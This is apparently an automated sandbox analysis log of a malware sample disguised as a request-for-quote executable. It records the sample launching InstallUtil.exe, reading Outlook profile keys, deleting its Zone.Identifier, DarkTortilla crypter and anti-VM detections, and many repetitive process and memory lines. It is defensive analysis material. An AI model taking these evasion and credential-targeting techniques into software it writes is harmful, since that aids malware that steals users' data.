                    Source: unknownProcess created: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe "C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe"
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    Yara detected DarkTortilla Crypter
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.42e56b0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.5620000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.42e56b0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.5620000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2475804920.0000000005620000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2463896944.0000000003101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe PID: 7380, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_0665B381 push 5805D183h; iretd 0_2_0665B38D
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_0682BCF3 push ebp; ret 0_2_0682BD23
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeCode function: 0_2_080BFD3A pushfd ; ret 0_2_080BFD41
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06692DBE pushfd ; retf 5_2_06692DC1
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeStatic PE information: section name: .text entropy: 6.98396364188515
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeFile created: \rfq sheets px2 mule25 shenzhen lucky.exe
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeFile created: \rfq sheets px2 mule25 shenzhen lucky.exeJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeFile opened: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe\:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe PID: 7380, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeMemory allocated: 16E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeMemory allocated: 3100000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeMemory allocated: 5100000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeMemory allocated: 8680000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeMemory allocated: 9680000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeMemory allocated: 9850000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeMemory allocated: A850000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeMemory allocated: ABF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeMemory allocated: BBF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeMemory allocated: CBF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2A30000 memory reserve | memory write watchJump to behavior
